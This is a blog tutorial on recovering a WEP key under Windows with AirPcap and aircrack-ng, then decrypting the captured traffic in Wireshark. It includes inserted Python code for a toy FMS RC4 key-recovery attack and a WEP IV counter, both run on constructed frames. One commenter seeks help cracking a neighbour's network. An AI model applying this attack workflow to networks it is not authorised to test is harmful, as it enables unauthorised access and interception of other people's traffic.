How to Crack WEP in Windows with Aircrack-ng and AirPcap

This guide demonstrates how to crack WEP in Windows using the AirPcap Wireless Capture Adapter. To do this, you'll need the useful AirPcap USB Wireless Capture Adapter from CACE Technologies. It's pretty cheap when compared to some of the other Windows hardware solutions, and you'll be supporting the makers of Wireshark!

Why Windows?

I adore Linux and the entire Open Source movement, but it's important to recognise that many people out there are locked into Windows; and learning an entirely new OS to perform security testing isn't cost-effective for their company.

How is WEP cracked?

WEP encrypts each frame with RC4, keyed with a 24-bit Initialisation Vector (IV) prepended to the static secret key. The IV is sent in the clear in every frame, and the first plaintext byte of every data frame is known (the LLC/SNAP header starts with 0xAA), so given enough IVs a statistical attack on RC4's key schedule (the FMS and KoreK attacks that aircrack-ng uses) recovers the key byte by byte. In normal WLAN traffic it would take quite a while to pick up enough IVs - approximately 1 million for the classic attacks, tens of thousands with the newer PTW attack - so we need to generate our own traffic. There are two ways we could do this:
  1. Generate your own traffic using iperf.
  2. Use packet injection with aireplay-ng.
At present, the AirPcap drivers do not support packet injection in Windows. Fortunately, the makers of AirPcap, CACE Technologies, have said packet injection will be included soon. :D Update 2007-06-11: Packet injection is now possible in Windows with the AirPcap. Please see my posts: Cracking WEP with Cain and Cracking WEP with aircrack-ptw for more information.
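To make the weakness concrete, here is an added example (my own illustration, not code from the original post or from aircrack-ng) of the FMS attack that the classic aircrack-ng modes are built on, run against a 40-bit key. It assumes a constructed capture in which every frame carries one of the "weak" IVs of the form (A+3, 255, X), and the key 1f:2a:3b:4c:5d is made up. A real capture contains only a small fraction of such IVs among the million collected, which is why so many are needed.

```python
# Added example (not from the original post): a toy FMS attack on 40-bit WEP.
# WEP's per-frame RC4 key is IV (3 bytes, sent in the clear) || secret key.
# The first plaintext byte of every WEP data frame is the LLC/SNAP DSAP, 0xAA,
# so the first keystream byte is known. IVs of the form (A+3, 255, X) leak
# key byte A with roughly 5% probability each; vote over many of them.
from collections import Counter

SNAP_DSAP = 0xAA          # first plaintext byte of every WEP data frame


def ksa(key, steps=256):
    """RC4 key scheduling. Returns (S, j) after `steps` rounds; the attack
    runs only the rounds whose key bytes it already knows."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key, n):
    """First n keystream bytes of RC4 under `key`."""
    S, _ = ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_first_cipher_byte(iv, key):
    """What a sniffer sees: SNAP DSAP XOR first keystream byte of RC4(iv || key)."""
    return rc4_keystream(bytes(iv) + key, 1)[0] ^ SNAP_DSAP


def weak_iv_capture(key, key_len=5):
    """Constructed capture: for every key byte A, all 256 IVs (A+3, 255, X),
    each paired with the first ciphertext byte. Stands in for the .iv file."""
    return [((a + 3, 255, x), wep_first_cipher_byte((a + 3, 255, x), key))
            for a in range(key_len) for x in range(256)]


def fms_votes(capture, known):
    """Vote for key byte A = len(known), given the bytes already recovered."""
    a = len(known)
    votes = Counter()
    for iv, c0 in capture:
        if iv[0] != a + 3 or iv[1] != 255:
            continue                              # not a weak IV for this byte
        S, j = ksa(bytes(iv) + bytes(known), a + 3)
        # "resolved" condition: S[1] and S[S[1]] sit where the remaining KSA
        # rounds are unlikely (~5%) to disturb them
        if S[1] >= a + 3 or ((S[1] + S[S[1]]) & 0xFF) != a + 3:
            continue
        out = c0 ^ SNAP_DSAP                      # first keystream byte
        votes[(S.index(out) - j - S[a + 3]) & 0xFF] += 1
    return votes


def recover_key(capture, key_len=5, width=8, check=8):
    """Depth-first search over the `width` best-voted candidates per byte;
    a full candidate key is confirmed against the first `check` frames."""
    def consistent(key):
        return all(wep_first_cipher_byte(iv, key) == c0
                   for iv, c0 in capture[:check])

    def search(prefix):
        if len(prefix) == key_len:
            key = bytes(prefix)
            return key if consistent(key) else None
        for byte, _ in fms_votes(capture, prefix).most_common(width):
            found = search(prefix + [byte])
            if found is not None:
                return found
        return None

    return search([])


if __name__ == "__main__":
    secret = bytes.fromhex("1f2a3b4c5d")        # constructed 40-bit WEP key
    capture = weak_iv_capture(secret)
    print("recovered", recover_key(capture).hex(), "from", len(capture), "frames")
```

The vote for each key byte is only right about one time in twenty, so the example keeps the eight best-voted candidates per byte and confirms the final key against a handful of frames; aircrack-ng does the same kind of ranked search, with many more IV classes than this single one, which is why it needs far fewer weak IVs than a naive vote.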

What will you need?

  • An AirPcap Wireless Capture adapter. This is a great little tool for 802.11 sniffing in Windows. You can even run Kismet with it!
  • The Aircrack-ng for AirPcap release by CACE Technologies.
  • Your own Wireless Access Point, configured with WEP.
  • Three computers, at least one of which has a wireless LAN adapter: one runs the AirPcap capture, the other two pass iperf traffic through the AP.
  • Enough traffic to generate over 1 million IVs. For this demonstration, we'll use a Windows release of iperf, called K-perf, to generate lots of traffic.

Let's get cracking

This guide assumes that you are performing this on a WLAN you have permission to use. OK let's do it...

Set up Aircrack

Plug in your AirPcap. Extract the contents of the aircrack-ng release to C:\aircrack (or wherever; I'm just doing this for tidiness). Open the c:\aircrack\bin\ directory and double-click airodump-ng.exe (this is a specially built release tailored for AirPcap). Answer its prompts for your setup: the AirPcap interface, the channel your AP is on, an output filename prefix (remember it, as the same file is fed to aircrack-ng later) and whether to write only the IVs rather than full packets, which keeps the capture small. [Screenshot: Configuring Airodump-ng]

Generate some traffic

Install K-perf, then run J-perf (its Java front-end) on the two machines connected to the AP; at least one of them should be connected over wireless so that the traffic actually crosses the air. Set one up as a server and the other as a client. Remember, we're only doing this to generate enough traffic on our demo WLAN. On the server, choose the 'Server' option, then click Run. [Screenshot: Server, Configure K-perf using the Java front-end, J-perf.] On the client, type in the server's IP address, set the time iperf should run to 1200 (seconds, i.e. 20 minutes), and click Run. [Screenshot: Client, Configure K-perf]

Capture and Crack

Go back to your AirPcap machine and watch the IV count climb. [Screenshot: Airodump-ng capturing WEP IVs] When you've collected over 1,000,000 IVs, open aircrack-ng_GUI.exe in the c:\aircrack\bin\ directory. Click the Aircrack-ng tab and locate your crackme.iv file (the airodump-ng output, named after the prefix you chose). Click Launch and wait for the cracker to find your WEP key. [Screenshot: Aircrack-ng cracking WEP] If aircrack-ng cannot find the key, you probably don't have enough IVs yet. To collect more, start airodump-ng.exe again and, when asked for the output filename prefix, give the same name as before; airodump-ng will then append to the original dump, and you can re-run aircrack-ng on the larger file.
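Airodump-ng does the counting for you; as an added example (not from the original post or from aircrack-ng) here is the same bookkeeping in Python over raw 802.11 frames, showing where the IV sits (immediately after the MAC header: three IV bytes, then a byte whose top two bits hold the key ID) and flagging IV reuse. Because the IV is only 24 bits, repeats are certain long before a million frames, and a repeated IV under the same key means a repeated keystream. The frames, BSSID and MAC addresses below are constructed for the example.

```python
# Added example (not from the original post): extract WEP IVs from raw 802.11
# data frames and count distinct IVs per BSSID, as airodump-ng does.
from collections import defaultdict

FC_TYPE_DATA = 0x08          # frame-control byte 0, bits 2-3: type 2 = data
FC_SUBTYPE_QOS = 0x80        # QoS data subtypes carry a 2-byte QoS control field
FC_SUBTYPE_NULL = 0x40       # null-function data frames carry no body
FLAG_TO_DS, FLAG_FROM_DS, FLAG_PROTECTED = 0x01, 0x02, 0x40   # frame-control byte 1


def parse_wep_frame(frame):
    """Return (bssid, iv, key_id, first_cipher_byte) for a WEP-protected data
    frame, or None for anything else (management, unprotected, WDS, truncated)."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 & 0x0C) != FC_TYPE_DATA or (fc0 & FC_SUBTYPE_NULL) or not (fc1 & FLAG_PROTECTED):
        return None
    to_ds, from_ds = bool(fc1 & FLAG_TO_DS), bool(fc1 & FLAG_FROM_DS)
    if to_ds and from_ds:
        return None                       # 4-address WDS frame: no single BSSID
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    bssid = addr1 if to_ds else addr2 if from_ds else addr3
    hdr = 24 + (2 if fc0 & FC_SUBTYPE_QOS else 0)
    # WEP header: 3-byte IV, then the key ID in the top two bits of a pad byte;
    # the body must hold at least one ciphertext byte plus the 4-byte ICV
    if len(frame) < hdr + 4 + 1 + 4:
        return None
    iv = bytes(frame[hdr:hdr + 3])
    key_id = frame[hdr + 3] >> 6
    return bytes(bssid), iv, key_id, frame[hdr + 4]


def iv_stats(frames):
    """Per BSSID: WEP frames seen, distinct IVs, and frames that reused an IV."""
    seen = defaultdict(set)
    stats = defaultdict(lambda: {"frames": 0, "unique_ivs": 0, "reused": 0})
    for frame in frames:
        parsed = parse_wep_frame(frame)
        if parsed is None:
            continue
        bssid, iv, _, _ = parsed
        s = stats[bssid]
        s["frames"] += 1
        if iv in seen[bssid]:
            s["reused"] += 1              # same IV + same key = same keystream
        else:
            seen[bssid].add(iv)
            s["unique_ivs"] += 1
    return dict(stats)


def build_wep_frame(bssid, src, dst, iv, body, qos=False, protected=True):
    """Constructed AP-to-station data frame (FromDS=1) with a WEP header;
    `body` stands in for the ciphertext and four zero bytes for the ICV."""
    fc0 = FC_TYPE_DATA | (FC_SUBTYPE_QOS if qos else 0)
    fc1 = FLAG_FROM_DS | (FLAG_PROTECTED if protected else 0)
    hdr = bytes([fc0, fc1, 0, 0]) + dst + bssid + src + b"\x10\x00"
    if qos:
        hdr += b"\x00\x00"
    return hdr + iv + b"\x00" + body + b"\x00" * 4


AP = bytes.fromhex("00112233aabb")           # constructed BSSID
STA = bytes.fromhex("00aabbccddee")          # constructed wireless station
SRV = bytes.fromhex("000c29445566")          # constructed wired host

SAMPLE_CAPTURE = [                           # constructed frames, not a real capture
    build_wep_frame(AP, SRV, STA, b"\x01\x00\x00", b"\xc7\x31\x9e"),
    build_wep_frame(AP, SRV, STA, b"\x02\x00\x00", b"\x0d\x5a\x77", qos=True),
    build_wep_frame(AP, SRV, STA, b"\x01\x00\x00", b"\x4f\x2c\x81"),   # IV reuse
    build_wep_frame(AP, SRV, STA, b"\x03\x00\x00", b"\xa1", protected=False),
    bytes([0x80, 0x00, 0, 0]) + b"\xff" * 6 + AP + AP + b"\x00\x00" + b"\x00" * 12,  # beacon
]

if __name__ == "__main__":
    for bssid, s in iv_stats(SAMPLE_CAPTURE).items():
        print(bssid.hex(":"), s)
```

Only protected data frames count: beacons, probes and unencrypted data carry no IV, so a busy channel can show far more packets than IVs, which is why the IV count, not the packet count, is what to watch.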

What next?

Traffic capture

As this is a simulation, now that you have your WEP key you can continue your penetration test by using AirPcap with Wireshark to capture the traffic flowing over the WLAN: enter the WEP key in Wireshark's IEEE 802.11 protocol preferences and it will decrypt the frames for you, so you can read everything on the network. Wireshark can do the same for a WPA/WPA2-PSK network, but only if you know (or have recovered) the passphrase and have captured the client's four-way handshake.

Educate!

As one of the aims of my blog is to help people, if you have friends/neighbours/co-workers whose WLANs are WEP enabled, you could demonstrate how easy it is to crack WEP, and then help them set up a properly-implemented WPA/WPA2 WLAN :) Did this help you at all? Any questions? Feel free to leave me a comment below!

8 thoughts on “How to Crack WEP in Windows with Aircrack-ng and AirPcap”

  1. Xavier

    Hi there

    Well, what is the exact use of the 125 GBP “AirPcap USB Wireless Capture Adapter” when using Wireshark? Perhaps my seven years in the field made me dumb or lazy but…

    Do you mean you REALLY can decrypt any (except well-configured WPA networks) WPA stuff? Also, does the adapter run under Vista Ultimate? Or do you “suppose” it should? Anyway, I was impressed, very nice job,

    All the best

  2. Phil Wiffen Post author

    Hi Xavier,

    The standard AirPcap is intended to allow passive sniffing and raw access to 802.11 packets in Windows. What this means is that Wireshark can now sniff raw 802.11 packets, which is useful for 802.11 diagnostics. Previously, as far as I’m aware, this was only possible by using Linux.

    My “What next?” explanation is a little fuzzy. What I’m trying to say is that, as you are supposed to be doing a security audit, once you have the WEP key, you can use Wireshark to decrypt the WEP packets and start to capture everything flowing over the network. The WPA part I mentioned relies on you either knowing the key, or cracking it using the EAPOL weakness. If you’re a Network Admin, being able to use Wireshark on 802.11 networks can be highly valuable during network troubleshooting.

    I hope that clears things up! If you have any other questions, don’t hesitate to ask :)

  3. guyfred

    hi there,

    I would like to ask: is there a way to generate enough traffic to a WEP-protected wireless router using only Windows XP, and how can I do this?
    Thanks in advance..

  4. Jozsef Madaras

    Good evening,

    I have an IBM T42 laptop with an Intel(R) PRO/Wireless 2200BG Network Connection wireless card. I use Windows XP as an operating system.
    I am not a very well-educated PC technician but I like to explore Windows programs myself.
    I haven’t done a WEP crack procedure before, and I didn’t find exactly how to do this with my wireless card.
    I’d like to get step-by-step instructions as I have some possibilities to use a WEP with mainly 5 green signals (maybe my very neighbour uses it).
    Please write me back to:

    madarasjozsef@lycos.com

    Thanks a lot! All the best,

    Jozsef Madaras /simply You can call me Joe/

  5. Phil Wiffen Post author

    Jozsef: Due to your situation – not being tech-savvy – I’d recommend you either: Ask your neighbour if you can give them a little money to share their Wi-Fi connection, or if you really want to learn about cracking WEP with your card, search the internet for any of the numerous tutorials on using Linux and aircrack-ng.
